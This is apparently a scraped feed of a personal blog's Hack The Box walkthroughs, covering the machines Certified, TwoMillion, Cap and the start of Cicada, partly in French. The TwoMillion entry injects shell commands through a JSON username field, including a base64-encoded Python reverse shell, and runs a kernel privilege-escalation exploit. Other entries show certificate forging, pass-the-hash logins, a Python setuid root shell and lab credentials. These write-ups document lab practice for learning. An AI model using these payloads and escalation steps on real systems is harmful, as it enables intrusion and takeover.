ldaps://10.10.11.41:636 - ssl [+] Default path: DC=certified,DC=htb [+] Configuration path: CN=Configuration,DC=certified,DC=htb [*] Updating user \u0026#39;ca_operator\u0026#39;: userPrincipalName : ca_operator@certified.htb [*] Successfully updated \u0026#39;ca_operator\u0026#39; Retrieving NT Hash via Forged Certificate Attempting authentication with the issued certificate now yields the NT hash of Administrator@corp.local. The command must include -domain due to the certificate\u0026rsquo;s lack of domain specification:\ncertipy-ad auth -pfx ./administrator.pfx -domain certified.htb Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@certified.htb [*] Trying to get TGT... 
[*] Got TGT [*] Saved credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;administrator\u0026#39; [*] Got hash for \u0026#39;administrator@certified.htb\u0026#39;: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 evil-winrm -i 10.10.11.41 -u Administrator -H 0d5b49608bbce1751f708748f67e2d34 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\Administrator\\Documents\u0026gt; cd ../Desktop *Evil-WinRM* PS C:\\Users\\Administrator\\Desktop\u0026gt; ls Directory: C:\\Users\\Administrator\\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/10/2024 9:26 AM 34 root.txt *Evil-WinRM* PS C:\\Users\\Administrator\\Desktop\u0026gt; cat root.txt dc1c.....fb35 ","date":"2024-12-11T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/certified-htb/","title":"HTB | Certified"},{"content":" Machine name OS IP Difficulty TwoMillion Linux 10.10.11.221 Easy Enumeration nmap ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -p- 10.10.11.221 Port 80 -\u0026gt; HTTP twomillion.htb /etc/hosts We add the necessary domain names. A little later we will discover that there is also the domain name: data.analytical.htb\n## ... 
10.10.11.221 twomillion.htb Foothold Invitation code - inviteapi Using Burp on the login page, we discover JavaScript code indicating that an account can be created with an invitation code. In it we find a link to a JavaScript file: http://2million.htb/js/inviteapi.min.js\neval(function(p, a, c, k, e, d) { e = function(c) { return c.toString(36) }; if (!\u0026#39;\u0026#39;.replace(/^/, String)) { while (c--) { d[c.toString(a)] = k[c] || c.toString(a) } k = [function(e) { return d[e] }]; e = function() { return \u0026#39;\\\\w+\u0026#39; }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp(\u0026#39;\\\\b\u0026#39; + e(c) + \u0026#39;\\\\b\u0026#39;, \u0026#39;g\u0026#39;), k[c]) } } return p }(\u0026#39;1 i(4){h 8={\u0026#34;4\u0026#34;:4};$.9({a:\u0026#34;7\u0026#34;,5:\u0026#34;6\u0026#34;,g:8,b:\\\u0026#39;/d/e/n\\\u0026#39;,c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:\u0026#34;7\u0026#34;,5:\u0026#34;6\u0026#34;,b:\\\u0026#39;/d/e/k/l/m\\\u0026#39;,c:1(0){3.2(0)},f:1(0){3.2(0)}})}\u0026#39;, 24, 24, \u0026#39;response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify\u0026#39;.split(\u0026#39;|\u0026#39;), 0, {})) This script contains obfuscated code, which indicates that a POST request is possible to: /api/v1/invite/how/to/generate\nTo generate an invitation code\nfunction verifyInviteCode(code) { var formData = { \u0026#34;code\u0026#34;: code }; $.ajax({ type: \u0026#34;POST\u0026#34;, dataType: \u0026#34;json\u0026#34;, data: formData, url: \u0026#39;/api/v1/invite/verify\u0026#39;, success: function (response) { console.log(response); }, error: function (response) { console.log(response); } }); } function 
makeInviteCode() { $.ajax({ type: \u0026#34;POST\u0026#34;, dataType: \u0026#34;json\u0026#34;, url: \u0026#39;/api/v1/invite/how/to/generate\u0026#39;, success: function (response) { console.log(response); }, error: function (response) { console.log(response); } }); } So we make this request:\nPOST /api/v1/invite/how/to/generate HTTP/1.1 Host: 2million.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;kvl37ft06haubd9f1davp7407bq=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 17 Origin: http://2million.htb Connection: close Referer: http://2million.htb/invite Cookie: PHPSESSID=kvl37ft06haubd9f1davp7407b code=\u0026lt;b\u0026gt;qsdqs\u0026lt;/b\u0026gt; HTTP/1.1 200 OK Server: nginx Date: Fri, 06 Dec 2024 23:44:09 GMT Content-Type: application/json Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 249 {\u0026#34;0\u0026#34;:200,\u0026#34;success\u0026#34;:1,\u0026#34;data\u0026#34;:{\u0026#34;data\u0026#34;:\u0026#34;Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \\/ncv\\/i1\\/vaivgr\\/trarengr\u0026#34;,\u0026#34;enctype\u0026#34;:\u0026#34;ROT13\u0026#34;},\u0026#34;hint\u0026#34;:\u0026#34;Data is encrypted ... We should probbably check the encryption type in order to decrypt it...\u0026#34;} We find there a message encrypted with ROT13. 
Thanks to the website dcode.fr we decrypt the following message:\nIn order to generate the invite code, make a POST request to \\/api\\/v1\\/invite\\/generate So we make this POST request in Burp:\nPOST /api/v1/invite/generate HTTP/1.1 Host: 2million.htb Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 Connection: close Cache-Control: max-age=0 Response:\nHTTP/1.1 200 OK Server: nginx Date: Sat, 07 Dec 2024 21:25:53 GMT Content-Type: application/json Connection: close Set-Cookie: PHPSESSID=nvi1ir085vrvc1cuqq22gjoaot; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 91 {\u0026#34;0\u0026#34;:200,\u0026#34;success\u0026#34;:1,\u0026#34;data\u0026#34;:{\u0026#34;code\u0026#34;:\u0026#34;SFE2OVUtMzE1Rk4tUTBUNU0tQko0NU8=\u0026#34;,\u0026#34;format\u0026#34;:\u0026#34;encoded\u0026#34;}} The code is sent to us in base64, which gives:\nHQ69U-315FN-Q0T5M-BJ45O\nWe import the verifyInviteCode function into the Firefox console, which tells us that the code is correct\nWe go to the page 2million.htb/invite and sign up with an account -\u0026gt; hello@hello.hello : hello\nadmin GET /api/v1 HTTP/1.1 Host: 2million.htb User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://2million.htb/home/access Cookie: PHPSESSID=dn1g3q7kgl2jj3ondr1sda9gm9 Upgrade-Insecure-Requests: 1 Priority: u=0, i HTTP/1.1 200 OK Server: nginx Date: Sat, 07 Dec 2024 22:51:47 GMT Content-Type: application/json 
Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 800 {\u0026#34;v1\u0026#34;:{\u0026#34;user\u0026#34;:{\u0026#34;GET\u0026#34;:{\u0026#34;\\/api\\/v1\u0026#34;:\u0026#34;Route List\u0026#34;,\u0026#34;\\/api\\/v1\\/invite\\/how\\/to\\/generate\u0026#34;:\u0026#34;Instructions on invite code generation\u0026#34;,\u0026#34;\\/api\\/v1\\/invite\\/generate\u0026#34;:\u0026#34;Generate invite code\u0026#34;,\u0026#34;\\/api\\/v1\\/invite\\/verify\u0026#34;:\u0026#34;Verify invite code\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/auth\u0026#34;:\u0026#34;Check if user is authenticated\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/vpn\\/generate\u0026#34;:\u0026#34;Generate a new VPN configuration\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/vpn\\/regenerate\u0026#34;:\u0026#34;Regenerate VPN configuration\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/vpn\\/download\u0026#34;:\u0026#34;Download OVPN file\u0026#34;},\u0026#34;POST\u0026#34;:{\u0026#34;\\/api\\/v1\\/user\\/register\u0026#34;:\u0026#34;Register a new user\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/login\u0026#34;:\u0026#34;Login with existing user\u0026#34;}},\u0026#34;admin\u0026#34;:{\u0026#34;GET\u0026#34;:{\u0026#34;\\/api\\/v1\\/admin\\/auth\u0026#34;:\u0026#34;Check if user is admin\u0026#34;},\u0026#34;POST\u0026#34;:{\u0026#34;\\/api\\/v1\\/admin\\/vpn\\/generate\u0026#34;:\u0026#34;Generate VPN for specific user\u0026#34;},\u0026#34;PUT\u0026#34;:{\u0026#34;\\/api\\/v1\\/admin\\/settings\\/update\u0026#34;:\u0026#34;Update user settings\u0026#34;}}}} We send this request:\nPUT /api/v1/admin/settings/update HTTP/1.1 Host: 2million.htb User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: 
fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive Referer: http://2million.htb/home/access Cookie: PHPSESSID=jg018kgbajmc0pjtrdo4dv603a Upgrade-Insecure-Requests: 1 Priority: u=0, i Content-Length: 52 { \u0026#34;email\u0026#34; : \u0026#34;hello@hello.hello\u0026#34;, \u0026#34;is_admin\u0026#34; : 1 } # RESPONSE HTTP/1.1 200 OK Server: nginx Date: Sat, 07 Dec 2024 23:59:01 GMT Content-Type: application/json Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 41 {\u0026#34;id\u0026#34;:22,\u0026#34;username\u0026#34;:\u0026#34;hello\u0026#34;,\u0026#34;is_admin\u0026#34;:1} We can ask to generate a VPN for a user. The username is injectable, as can be seen with the curl command here.\ncurl -X POST http://2million.htb/api/v1/admin/vpn/generate \\ -H \u0026#34;Host: 2million.htb\u0026#34; \\ -H \u0026#34;User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0\u0026#34; \\ -H \u0026#34;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#34; \\ -H \u0026#34;Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\u0026#34; \\ -H \u0026#34;Accept-Encoding: gzip, deflate, br\u0026#34; \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -H \u0026#34;Connection: keep-alive\u0026#34; \\ -H \u0026#34;Referer: http://2million.htb/home/access\u0026#34; \\ -H \u0026#34;Cookie: PHPSESSID=jg018kgbajmc0pjtrdo4dv603a\u0026#34; \\ -H \u0026#34;Upgrade-Insecure-Requests: 1\u0026#34; \\ --data \u0026#39;{\u0026#34;username\u0026#34;:\u0026#34;admin;whoami;\u0026#34;}\u0026#39; www-data Reverse Shell : www-data curl -X POST http://2million.htb/api/v1/admin/vpn/generate \\ -H \u0026#34;Host: 2million.htb\u0026#34; \\ -H \u0026#34;User-Agent: Mozilla/5.0 (X11; Ubuntu; 
Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0\u0026#34; \\ -H \u0026#34;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#34; \\ -H \u0026#34;Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\u0026#34; \\ -H \u0026#34;Accept-Encoding: gzip, deflate, br\u0026#34; \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -H \u0026#34;Connection: keep-alive\u0026#34; \\ -H \u0026#34;Referer: http://2million.htb/home/access\u0026#34; \\ -H \u0026#34;Cookie: PHPSESSID=jg018kgbajmc0pjtrdo4dv603a\u0026#34; \\ -H \u0026#34;Upgrade-Insecure-Requests: 1\u0026#34; \\ --data \u0026#39;{\u0026#34;username\u0026#34;:\u0026#34;admin;echo ZXhwb3J0IFJIT1NUPSIxMC4xMC4xNi41NSI7ZXhwb3J0IFJQT1JUPTkwMDE7cHl0aG9uMyAtYyAnaW1wb3J0IHN5cyxzb2NrZXQsb3MscHR5O3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgob3MuZ2V0ZW52KCJSSE9TVCIpLGludChvcy5nZXRlbnYoIlJQT1JUIikpKSk7W29zLmR1cDIocy5maWxlbm8oKSxmZCkgZm9yIGZkIGluICgwLDEsMildO3B0eS5zcGF3bigic2giKSc= | base64 -d | sh;\u0026#34;}\u0026#39; www-data -\u0026gt; admin .env file : admin credentials En observant les fichiers du site web depuis www-data on observe le fichier **index.php **qui semble recupérer des credentials depuis le fichier .env\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $envFile = file(\u0026#39;.env\u0026#39;); $envVariables = []; foreach ($envFile as $line) { $line = trim($line); if (!empty($line) \u0026amp;\u0026amp; strpos($line, \u0026#39;=\u0026#39;) !== false) { list($key, $value) = explode(\u0026#39;=\u0026#39;, $line, 2); $key = trim($key); $value = trim($value); $envVariables[$key] = $value; } } $dbHost = $envVariables[\u0026#39;DB_HOST\u0026#39;]; $dbName = $envVariables[\u0026#39;DB_DATABASE\u0026#39;]; $dbUser = $envVariables[\u0026#39;DB_USERNAME\u0026#39;]; $dbPass = $envVariables[\u0026#39;DB_PASSWORD\u0026#39;]; En affichant .env, on trouve les credentials admin:\n1 2 3 4 5 $ cat .env DB_HOST=127.0.0.1 DB_DATABASE=htb_prod DB_USERNAME=admin DB_PASSWORD=SuperDuperPass123 On se connecte en ssh a 
l\u0026rsquo;utilisateur admin:\n1 2 3 4 5 $ ssh admin@2million.htb admin@2million:~$ ls user.txt admin@2million:~$ cat user.txt 1489.....d42e Privilege Escalation Mails : /var/mail/admin Avec linpeas, on observe que admin a des mails à lire dans /var/mail/admin. Ce mail indique qu\u0026rsquo;une vulnérabilité du kernel linux \u0026ldquo;OverlayFS / FUSE\u0026rdquo; semble exploitable.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 cat /var/mail/admin From: ch4p \u0026lt;ch4p@2million.htb\u0026gt; To: admin \u0026lt;admin@2million.htb\u0026gt; Cc: g0blin \u0026lt;g0blin@2million.htb\u0026gt; Subject: Urgent: Patch System OS Date: Tue, 1 June 2023 10:45:22 -0700 Message-ID: \u0026lt;9876543210@2million.htb\u0026gt; X-Mailer: ThunderMail Pro 5.2 Hey admin, I\u0026#39;m know you\u0026#39;re working as fast as you can to do the DB migration. While we\u0026#39;re partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can\u0026#39;t get popped by that. HTB Godfather CVE-2023-0386 : Kernel Exploit Sur internet, on trouve la CVE-2023-0386 avec un repo github\nhttps://github.com/xkaneiki/CVE-2023-0386/tree/main\nOn execute l\u0026rsquo;exploit:\ndans un premier terminal on fait: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ make all $ ./fuse ./ovlcap/lower ./gc [+] len of gc: 0x3ee0 mkdir: File exists [+] readdir [+] getattr_callback /file [+] open_callback /file [+] read buf callback offset 0 size 16384 path /file [+] open_callback /file [+] open_callback /file [+] ioctl callback path /file cmd 0x80086601 Dans un deuxième terminal, on execute finalement un deuxième binaire pour obtenir les droits root: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ./exp uid:1000 gid:1000 [+] mount success total 8 drwxrwxr-x 1 root root 4096 Dec 8 12:53 . drwxrwxr-x 6 root root 4096 Dec 8 12:52 .. -rwsrwxrwx 1 nobody nogroup 16096 Jan 1 1970 file [+] exploit success! 
To run a command as administrator (user \u0026#34;root\u0026#34;), use \u0026#34;sudo \u0026lt;command\u0026gt;\u0026#34;. See \u0026#34;man sudo_root\u0026#34; for details. root@2million:/tmp/t/linux/exploit/CVE-2023-0386# sudo su root@2million:/tmp/t/linux/exploit/CVE-2023-0386# cd /root root@2million:~# cat root.txt 7e64.....db13 CVE-2023-0386 : Explanation A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.\nExploitation :\nUn attaquant crée un environnement spécifique (par exemple, un container ou un espace utilisateur) pour exploiter une mauvaise gestion des droits dans OverlayFS et exécuter du code malveillant avec les privilèges root.\n","date":"2024-12-08T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/twomillion-htb/","title":"HTB | TwoMillion"},{"content":" Machine name OS IP Difficulty Cap Linux 10.10.10.245 Easy Users 1 nathan : Buck3tH4TF0RM3! Enumeration nmap 1 2 3 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -p- 10.10.10.245 Port 80 : HTTP - http://cap.htb /etc/hosts On ajoute les noms de domaines necessaire. Un peu plus tard on découvrira qu\u0026rsquo;il y a également le nom de domaine: data.analytical.htb\n1 2 ## ... 10.10.10.245 cap.htb Foothold Snapshot On observe un bouton snapshot qui permet visualiser des fichiers de capture reseau .pcap. On observe l\u0026rsquo;url :\nhttp://cap.htb/data/3 On peut download via un bouton, sur Burp on observe un appel a l\u0026rsquo;url: http://cap.htb/download/3\nOn download le plus de pcap possible pour les observer, on peut voir que le numéro 0 est intéressant. 
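The capture found through the IDOR above is what gives away the FTP login. As an added example (not part of the original write-up, and not the box's own code), here is a dependency-free way to do what the author did by eye in the snapshot viewer: parse a classic libpcap file, reassemble the client-to-server side of each FTP control connection and pull out USER/PASS pairs. The capture it runs on is constructed in the block itself with the credentials from this page; the hostnames, ports and timestamps are made up for the example.

```python
"""Extract plaintext FTP logins from a libpcap capture (added example, stdlib only).

Handles Ethernet/IPv4/TCP frames in the classic pcap format (magic 0xA1B2C3D4 or
0xA1B23C4D, either byte order); pcapng and other link types are out of scope.
"""
import struct

LINKTYPE_ETHERNET = 1


def _tcp_payloads(pcap: bytes):
    """Yield (src_ip, dst_ip, src_port, dst_port, payload) for every TCP segment."""
    magic, = struct.unpack("<I", pcap[:4])
    endian = "<" if magic in (0xA1B2C3D4, 0xA1B23C4D) else ">"
    # global header: magic, version major/minor, thiszone, sigfigs, snaplen, linktype
    linktype = struct.unpack(endian + "IHHiIII", pcap[:24])[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:  # not TCP
            continue
        total_len = struct.unpack("!H", ip[2:4])[0]
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        yield src, dst, sport, dport, tcp[data_off:]


def ftp_credentials(pcap: bytes, port: int = 21):
    """Return [(client, server, user, password)] for each login seen on the control port."""
    streams = {}
    for src, dst, sport, dport, payload in _tcp_payloads(pcap):
        if dport == port and payload:
            streams.setdefault((src, dst, sport), bytearray()).extend(payload)
    found = []
    for (src, dst, _), data in streams.items():
        user = None
        for line in data.decode("latin-1").split("\r\n"):
            if line.upper().startswith("USER "):
                user = line[5:]
            elif line.upper().startswith("PASS ") and user is not None:
                found.append((src, dst, user, line[5:]))
                user = None  # a second login in the same stream is reported on its own
    return found


def _frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Minimal Ethernet/IPv4/TCP frame; checksums stay zero, the parser ignores them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def sample_pcap() -> bytes:
    """Constructed capture: one FTP login between a made-up client and cap.htb."""
    client, server = "10.10.14.1", "10.10.10.245"
    exchange = [
        (server, client, 21, 54321, b"220 (vsFTPd 3.0.3)\r\n"),
        (client, server, 54321, 21, b"USER nathan\r\n"),
        (server, client, 21, 54321, b"331 Please specify the password.\r\n"),
        (client, server, 54321, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
        (server, client, 21, 54321, b"230 Login successful.\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for n, (s, d, sp, dp, data) in enumerate(exchange):
        frame = _frame(s, d, sp, dp, data)
        out += struct.pack("<IIII", 1700000000 + n, 0, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    for client, server, user, password in ftp_credentials(sample_pcap()):
        print(f"{client} -> {server}: {user} / {password}")
```

Run it on a real download (`ftp_credentials(open("0.pcap", "rb").read())`) to get the same result as opening the file in Wireshark and following the TCP stream; the point is that anything sent over FTP, Telnet or HTTP is readable by whoever holds the capture, which is exactly why the box exposes it.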
Inside it, we find the packet capture of an FTP session with the user/password in clear text:\n\n220 (vsFTPd 3.0.3)\nUSER nathan\n331 Please specify the password.\nPASS Buck3tH4TF0RM3!\n\nFTP - user flag\n\nWe log in to FTP as nathan and grab the user flag:\n\nftp cap.htb\nConnected to cap.htb.\n220 (vsFTPd 3.0.3)\nName (cap.htb:leopold): nathan\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls\n229 Entering Extended Passive Mode (|||41519|)\n150 Here comes the directory listing.\n-rwxrwxr-x 1 1001 1001 46631 Dec 06 17:17 linenum.sh\n-r-------- 1 1001 1001    33 Dec 06 13:10 user.txt\n226 Directory send OK.\nftp> cat user.txt\n?Invalid command.\nftp> get user.txt\nlocal: user.txt remote: user.txt\n229 Entering Extended Passive Mode (|||44318|)\n150 Opening BINARY mode data connection for user.txt (33 bytes).\n100% |***************************************************| 33 608.04 KiB/s 00:00 ETA\n226 Transfer complete.\n33 bytes received in 00:00 (0.17 KiB/s)\n\nPrivilege Escalation\n\nLinPEAS: Python SUID -> cap_setuid\n\nThe same password lets us SSH in as nathan. Then we find the vulnerability: /usr/bin/python3.8 carries the cap_setuid file capability, so any Python script nathan runs may call setuid(0) and then execute whatever it likes as root:\n\n$ ./linpeas.sh\n...\nFiles with capabilities (limited to 50):\n/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip\n...\n\nnathan@cap:~/a$ vim please_dont_do_this.py\nimport os\n# Switch the UID to root\nos.setuid(0)\n# Start an interactive shell with root privileges\nos.system(\"/bin/bash\")\n\nnathan@cap:~/a$ python3 please_dont_do_this.py\nroot@cap:~/a# whoami\nroot\nroot@cap:~# cd /root\nroot@cap:/root# cat root.txt\nd5d1.....bcf0\n\nA setuid capability on an interpreter is equivalent to a root setuid shell for every user allowed to run it; the fix is to drop it (setcap -r /usr/bin/python3.8) and give the service that needed a privileged port a dedicated binary or a systemd socket instead.\n","date":"2024-12-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/cap-htb/","title":"HTB | Cap"},{"content":" Machine name: Cicada | OS: Windows | IP: 10.10.11.35 | Difficulty: Easy\nUsers:\nmichael.wrightson:`Cicada$M6Corpb*@Lp#nZp!8`\ndavid.orelious:`aRt$Lp#7t*VQ!3`\nemily.oscars:`Q!3@Lp#M6b*7t*Vt`\n\nEnumeration\n\nnmap\n\n$ nmap 10.10.11.35 -sV -sC -T4 -Pn\nPORT     STATE SERVICE       VERSION\n53/tcp   open  domain        Simple DNS Plus\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb\n| Not valid before: 2024-08-22T20:24:16\n|_Not valid after:  2025-08-22T20:24:16\n445/tcp  open  microsoft-ds?\n464/tcp  open  kpasswd5?\n3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)\n| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb\n| Not valid before: 2024-08-22T20:24:16\n|_Not valid after:  2025-08-22T20:24:16\n|_ssl-date: TLS randomness does not represent time\nService Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode:\n|   3:1:1:\n|_    Message signing enabled and required\n| smb2-time:\n|   date: 2024-12-01T07:50:09\n|_  start_date: N/A\n|_clock-skew: 7h00m00s\n\nFoothold\n\nSMB: HR share\n\nWe list the SMB shares with an anonymous (null) session:\nsmbclient -N -L //10.10.11.35\n\nWe get the following shares:\n\nSharename  Type  Comment\n---------  ----  -------\nADMIN$     Disk  Remote Admin\nC$         Disk  Default share\nDEV        Disk\nHR         Disk\nIPC$       IPC   Remote IPC\nNETLOGON   Disk  Logon server share\nSYSVOL     Disk  Logon server share\n\nDEV and HR look interesting! We check whether they can be read anonymously:\n\n# DEV\n$ smbclient //10.10.11.35/DEV -N\nsmb: \\> ls\nNT_STATUS_ACCESS_DENIED\n\n# HR\n$ smbclient //10.10.11.35/HR -N\nsmb: \\> ls\n  .                    D     0  Thu Mar 14 08:29:09 2024\n  ..                   D     0  Thu Mar 14 08:21:29 2024\n  Notice from HR.txt   A  1266  Wed Aug 28 13:31:48 2024\nsmb: \\> get \"Notice from HR.txt\"\ngetting file \\Notice from HR.txt of size 1266 as Notice from HR.txt (6.1 KiloBytes/sec) (average 6.1 KiloBytes/sec)\n\nThe file is an onboarding notice that contains the default password handed to every new hire: Cicada$M6Corpb*@Lp#nZp!8\n\ncat Notice\\ from\\ HR.txt\nDear new hire!\n\nWelcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.\n\nYour default password is: Cicada$M6Corpb*@Lp#nZp!8\n\nTo change your password:\n\n1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.\n2. Once logged in, navigate to your account settings or profile settings section.\n3. Look for the option to change your password. This will be labeled as \"Change Password\".\n4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.\n5. After changing your password, make sure to save your changes.\n\nRemember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.\n\nIf you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.\n\nThank you for your attention to this matter, and once again, welcome to the Cicada Corp team!\n\nBest regards,\nCicada Corp\n\nUser enumeration\n\nThe next step is to find the username that goes with this password. I tried a great many scripts to list user names without having an account.
Only one command worked: a RID brute force through the built-in guest account, which succeeds here because guest is still enabled on the DC:\n\n$ nxc smb 10.10.11.35 -u 'guest' -p '' -d 'cicada.htb' --rid-brute\nSMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)\nSMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\guest:\nSMB 10.10.11.35 445 CICADA-DC 498: CICADA\\Enterprise Read-only Domain Controllers (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 500: CICADA\\Administrator (SidTypeUser)\nSMB 10.10.11.35 445 CICADA-DC 501: CICADA\\Guest (SidTypeUser)\nSMB 10.10.11.35 445 CICADA-DC 502: CICADA\\krbtgt (SidTypeUser)\nSMB 10.10.11.35 445 CICADA-DC 512: CICADA\\Domain Admins (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 513: CICADA\\Domain Users (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 514: CICADA\\Domain Guests (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 515: CICADA\\Domain Computers (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 516: CICADA\\Domain Controllers (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 517: CICADA\\Cert Publishers (SidTypeAlias)\nSMB 10.10.11.35 445 CICADA-DC 518: CICADA\\Schema Admins (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 519: CICADA\\Enterprise Admins (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 520: CICADA\\Group Policy Creator 